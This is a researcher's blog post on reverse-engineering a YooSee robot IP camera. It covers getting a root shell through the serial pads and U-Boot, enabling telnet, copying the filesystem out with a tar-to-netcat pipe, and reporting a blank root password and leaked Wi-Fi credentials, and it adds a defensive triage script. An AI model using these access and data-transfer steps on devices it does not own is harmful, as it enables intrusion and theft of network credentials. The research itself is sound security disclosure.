Freetime hacking of a YooSee Robot – Cureblog

Author: Marco Lux
Date: 2023-01-27 12:51:25

Image: robot1.png

General

The robot has limited flexibility in its movement: it can rotate its head left and right, both manually and by means of head tracking. Connecting to the device is done through the now common approach of a WLAN hosted by the robot itself, over which the SSID and password of the owner's WLAN are communicated. This is achieved with a basic Android or iOS application. The app itself provides remote control and configuration capabilities. On the robot's side, it also allows storing the video stream both on an SD card and in cloud storage.

It is clear that the device is able to communicate over the internet and/or the local network, as I observed during my analysis of the network traffic, which is primarily based on a proprietary protocol using UDP as the transport layer.

One aspect that particularly caught my attention during my analysis was the fact that the camera remains functional even when the visor is closed, covering the lens. It's worth mentioning that while this functionality may be by design, it could be perceived as suspicious and raise concern.

Hardware

After experimenting with the Android application, I decided to dig deeper and examine the inner workings of the device.
Image: sidenr2.png
Numbers in red:

  1. Anyka CPU/SoC (System on Chip) – AK3918EV200
  2. Place of the camera lens itself before it was removed

The system on chip (SoC) used in this device is specifically designed for IP cameras. From quick research, it is my impression that this chip, along with its subsequent revisions, as well as the printed circuit board (PCB), is commonly used in low-cost Chinese surveillance cameras.
Upon further investigation, I found that the device is more complex than I had initially expected. It is equipped with two motors, one for vertical head movement and the other for horizontal rotation.
Image: sidenr3.png
Numbers:

  1. Motor for movement of the head
  2. Motor for movement of the head
  3. WiFi card
  4. Slot for SD card
  5. Reference for chapter "Getting a shell"
  6. Power

On the back of the robot's shell, I discovered a micro-USB connector. However, upon inspection, I determined that it is only used to provide power and is not connected to any data transfer pins. Specifically, the RX and TX pins are not in use and the connector merely provides access to ground and voltage.

Getting a shell

Upon further investigation of the device's mainboard, I noticed three little holes located near the speaker connector (as seen in picture number 5). Upon testing with a low-cost logic analyzer, I discovered that data is being transmitted there.
Image: logicanalyzer4.png
To replicate this discovery, you can use the logic analyzer linked in the appendix, along with software such as Saleae or the open-source alternative Sigrok.
In order to attach to sockets on the board, I found that using hook clips is an effective and cost-efficient solution. They are readily available and proved to be a reliable tool for this purpose.
Image: hookit5.png
Numbers:

  1. TX wire (left clip)
  2. RX wire (right clip)

As expected, further experiments showed that by connecting a TTL converter to the hooks and the converter to my notebook's USB port, it is possible to access the robot's TTY interface. The connection is established at a baud rate of 115200.
Upon successful connection, I was presented with U-Boot, a popular open-source bootloader.

U-Boot 2013.10.0-AK_V2.0.04 (Apr 08 2021 - 12:40:06)

DRAM:  64 MiB
8 MiB
Create flash partition table init OK!
ANYKA SDHC/MMC4.0: 0
Load Env CRC OK!
In:    serial
Out:   serial
Err:   serial
Net:   AKEthernet-0

Hit any key to stop autoboot:  1                                                                                                                                   0 
anyka#

Gaining access to the boot manager also opens up the possibility to read and write parts of the file system, memory, and bootloader. One could even potentially boot from a different device. However, my primary focus was to determine whether it is possible to access the operating system directly and uncover what happens after the boot process.

   Booting kernel from Legacy Image at 81808000 ...
   Image Name:   Linux-3.4.35
   Image Type:   ARM Linux Kernel Image (uncompressed)
   Data Size:    1329632 Bytes = 1.3 MiB
   Load Address: 81808000
   Entry Point:  81808040
   Verifying Checksum ... OK
   XIP Kernel Image ... OK

Anyka Linux Kernel Version: 2.5.05

Linux version 3.4.35 (root@linux-compiler1) (gcc version 4.8.5 (anyka (gcc-4.8.5 + binutils-2.24 + ulcibc-0.9.33.2)(20170223)) ) #41 Thu Jun 3 21:28:02 CST 2021
CPU: ARM926EJ-S [41069265] revision 5 (ARMv5TEJ), cr=00053177
CPU: VIVT data cache, VIVT instruction cache
Machine: AK3918EV200_GWELL_V1

Kernel command line: console=ttySAK0,115200n8 root=/dev/mtdblock4 rootfstype=squashfs init=/sbin/init mem=64M memsize=64M

To my advantage, the device had no password set, allowing me to easily log in as root.
Upon logging in, I found that the main application, called ipc, was producing a large number of debug messages, and network access was not yet available. I decided to set up a network shell for further exploration. To my surprise, the device's developers had left a telnet daemon on it for my convenience.
telnetd &

Network Activity

IP information after joining the camera's wireless network:

10.200.226.100 -- Client in Robot Network  
10.200.226.1 -- Robot dhcp  

Note:
Ports 5000/tcp (SOAP) and 554/tcp (RTSP) are open.
Reverse lookups of the following addresses:

Host 184.181.43.121.in-addr.arpa. not found: 3(NXDOMAIN)
5.5.5.223.in-addr.arpa domain name pointer public1.alidns.com.
Host 247.77.91.47.in-addr.arpa. not found: 3(NXDOMAIN)
114.114.114.114.in-addr.arpa domain name pointer public1.114dns.com.

Some servers the unit connects to:

p2pu_start_process_query_dns_v2
[msg] Nameserver 8.8.8.8:53 has failed: Network is unreachable
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p1.cloudlinks.cn )
[msg] Nameserver 114.114.114.114:53 has failed: Network is unreachable
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p4.cloud-links.net )
[msg] Nameserver 223.5.5.5:53 has failed: Network is unreachable
[msg] All nameservers have failed
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p2.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p3.cloud-links.net )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p5.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p6.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p7.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p8.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p9.cloudlinks.cn )
p2pu_start_process_query_dns_v2: evdns_getaddrinfo( p2p10.cloudlinks.cn )

Dumping the Filesystem

Interestingly, during my research I came across a few other people who have also been working on this device, some years ago. However, one individual, known as T-Rekt, appears to be currently active in this field. T-Rekt has published a dump of the file system and, if my understanding of the code is right, an unpacker for the "encrypted" firmware downloaded from the cloud service. I have not yet investigated T-Rekt's work in depth, but it may be worth looking into.
In order to gain a better understanding of what we are dealing with, I found it helpful to download the files of the device. Once again, the device's developers made this task easy by providing netcat, which facilitates the transfer of data over a network.
Camera side (stream a tar archive of the persistent directories to the notebook; /proc, /sys, /dev and the tmpfs mounts are left out):

# tar cvf - /bin /etc /init /ipc /lib /rom /sbin /usr | nc -v 10.1.1.1 9999

Notebook side (listen and write the stream to a file):

# nc -v -l -p 9999 > fs.tar

As soon as it is done, we can unpack it and start investigating the downloaded files.

Telnet Shell

[root@anyka ~]$ ls
bin   dev   etc   init  ipc   lib   mnt   proc  rom   sbin  sys   tmp   usr   var
[root@anyka ~]$ uname -a
Linux anyka 3.4.35 #41 Thu Jun 3 21:28:02 CST 2021 armv5tejl GNU/Linux
[root@anyka ~]$ id
uid=0(root) gid=0(root) groups=0(root)
[root@anyka ~]$

Local Live Analysis

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:5000            0.0.0.0:*               LISTEN      427/ipc
tcp        0      0 0.0.0.0:554             0.0.0.0:*               LISTEN      427/ipc
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      578/telnetd
tcp        0      1 10.x.x.x:35544         47.91.77.247:51701      SYN_SENT    427/ipc
tcp        0      0 10.x.x.x:23            10.x.x.x:58140         ESTABLISHED 578/telnetd
tcp        0  65160 10.x.x.x:49670         10.x.x.x:8787          ESTABLISHED 7269/nc
tcp        0    171 10.x.x.x:23            10.x.x.x:41320         ESTABLISHED 578/telnetd
udp        0      0 0.0.0.0:51463           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:38922           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:3702            0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:51109           0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:51880           0.0.0.0:*                           427/ipc
udp        0      0 127.0.0.1:4278          0.0.0.0:*                           434/
udp        0      0 127.0.0.1:4279          0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:8899            0.0.0.0:*                           427/ipc
udp        0      0 0.0.0.0:60617           0.0.0.0:*                           427/ipc
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node PID/Program name    Path
unix  4      [ ]         DGRAM                       120 347/syslogd         /dev/log
unix  2      [ ]         DGRAM                       213 483/wpa_supplicant  /etc/Wireless/wlan0
unix  2      [ ]         DGRAM                       173 427/ipc

Password file:

[root@anyka /etc] cat passwd
root:x:0:0:root:/:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh

As root has no password set, there is also no password hash or similar in the shadow file.

cat shadow
root::0:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::


[root@anyka /etc] cat wifi*
bssid=xx.xx.xx.xx.xx.xx
ssid=testnet
id=0
passphrase=vrysecure
psk=ADDEADDE...
mode=station
pairwise_cipher=CCMP
group_cipher=CCMP
key_mgmt=WPA2-PSK
wpa_state=COMPLETED
ip_address=10.x.x.x.x
address=xx.xx.xx.xx.xx.xx
signal_level=169
bssid / frequency / signal level / flags / ssid

Mounted filesystems:

rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
devtmpfs on /dev type devtmpfs (rw,relatime,mode=0755)
proc on /proc type proc (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
tmpfs on /var type tmpfs (rw,relatime)
devpts on /dev/pts type devpts (rw,relatime,mode=600,ptmxmode=000)
tmpfs on /mnt type tmpfs (rw,relatime)
sysfs on /sys type sysfs (rw,relatime)
/dev/mtdblock6 on /rom type jffs2 (rw,relatime)
tmpfs on /mnt/ramdisk type tmpfs (rw,relatime)
tmpfs on /etc type tmpfs (rw,relatime)
tmpfs on /tmp type tmpfs (rw,relatime)
/dev/mtdblock5 on /ipc type squashfs (ro,relatime)
/dev/mtdblock5 on /usr type squashfs (ro,relatime)

It should also be noted that there are some extra modules to control the motors. It would probably be quite interesting to write a small external app to control them.

In Regard of Security

These are just some quick notes and are the tip of the iceberg at best. Without doubt the robot has plenty of attack surface available.

No login password

A physical connection to the device grants easy shell access.

Wifi Credentials

Regardless of the network configuration, the device outputs the network name and password as debug messages during runtime. This is a critical security vulnerability, as it allows easy access to the device's network and potentially the device itself, even if a physical connection is needed.
Example:

[vInitNetSupportVal] fgEth0Support = 0,fgRa0Support = 1
Init SSID=testnet, EncType=2, Password=vrysecure
Init SSID=Free-AP1, EncType=0, Password= 
Init SSID=Free-AP2, EncType=0, Password= 
Init SSID=Free-AP3, EncType=0, Password= 
Init SSID=testnet, EncType=2, Password=vrysecure 
[iParseWifiModuleType] wifi type: WIFI_TYPE_RDA5995
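As an added example (not code from the original post), a small Python triage script that runs over a dumped filesystem and the captured console log and flags the three findings above: the empty root field in /etc/shadow, the plaintext passphrase in the wpa_supplicant status file under /etc, and the SSID/password pairs the ipc binary prints on the serial console. The sample inputs are constructed to mirror the formats shown on this page.

```python
import re

# Constructed samples mirroring the formats seen on the device, not the real dump.
SHADOW = """root::0:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
"""
WIFI_STATUS = """ssid=testnet
passphrase=vrysecure
psk=ADDEADDE
key_mgmt=WPA2-PSK
"""
CONSOLE_LOG = """[vInitNetSupportVal] fgEth0Support = 0,fgRa0Support = 1
Init SSID=testnet, EncType=2, Password=vrysecure
Init SSID=Free-AP1, EncType=0, Password=
[iParseWifiModuleType] wifi type: WIFI_TYPE_RDA5995
"""

def passwordless_accounts(shadow_text):
    # Empty second field = login without a password; '*' or '!' means locked and is skipped.
    return [line.split(":")[0] for line in shadow_text.splitlines()
            if ":" in line and line.split(":")[1] == ""]

def plaintext_wifi_secrets(status_text):
    # wpa_supplicant status keys that carry the network secret in the clear.
    secrets = {}
    for line in status_text.splitlines():
        key, _, value = line.partition("=")
        if key in ("passphrase", "psk") and value:
            secrets[key] = value
    return secrets

LOG_CRED_RE = re.compile(r"Init SSID=(?P<ssid>[^,]+), EncType=\d+, Password=(?P<pw>\S*)")

def leaked_log_credentials(log_text):
    # (ssid, password) pairs the ipc binary prints on the console; open APs (no password) are skipped.
    return [(m.group("ssid"), m.group("pw"))
            for m in LOG_CRED_RE.finditer(log_text) if m.group("pw")]

def triage(shadow_text, status_text, log_text):
    # One flat report over all three checks; an empty list means nothing was found.
    findings = [f"empty password for '{u}' in /etc/shadow" for u in passwordless_accounts(shadow_text)]
    findings += [f"plaintext {k} in wifi status file: {v}" for k, v in plaintext_wifi_secrets(status_text).items()]
    findings += [f"credentials in console log: SSID={s} password={p}" for s, p in leaked_log_credentials(log_text)]
    return findings

if __name__ == "__main__":
    print("\n".join(triage(SHADOW, WIFI_STATUS, CONSOLE_LOG)))
```

On a real dump, feed the script the contents of etc/shadow, the wifi status file from /etc and a saved serial-console capture instead of the constructed samples.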

Data privacy

In conclusion, it is my strong belief that this type of camera should not be used in companies or other potentially sensitive environments.

IPC Main Component

I spent some hours swinging through the ARM assembly of the main program. This and additional software on the device leave the impression of home-made encryption and memory corruption. I might publish a second piece of writing on this in the future.

Outro

This was a quick dive into accessing the device. Further research is necessary to analyze the software supplied with it.

Links

I have sorted the links for additional research.

Hardware

System on Chip

A later version of the chip:
http://www.unifore.net/ip-video-surveillance/anyka-ak3918ev300-1080p-ip-camera-solution.html

USB to TTL Serial

These are good examples to get you going. You will find even cheaper ones. They are not the ones I used, but they are the type of device you can use.
http://www.amazon.com/Gumps-grocery-Module-Converter-Replace/dp/B081L482DP
http://www.amazon.com/DGZZI-PL2303TA-Console-Serial-Raspberry/dp/B07W42V16T/
http://www.amazon.com/Adapter-Serial-Converter-Development-Projects/dp/B075N82CDL

Logic Analyser

This is the one I used for attaching to the different slots and holes and analyzing the results.
http://www.amazon.com/KeeYees-Analyzer-Device-Channel-Arduino/dp/B07K6HXDH1

Software for Logic Analyzers

http://www.saleae.com/downloads/
http://sigrok.org/wiki/Main_Page

Repositories

http://github.com/c0decave/yoosee-ipc
http://github.com/t-rekttt/yoosee-exploit

http://thao.pw/hacking-yoosee-camera/

Product

It is currently being sold as a "robot camera" on the online marketplace AliExpress.
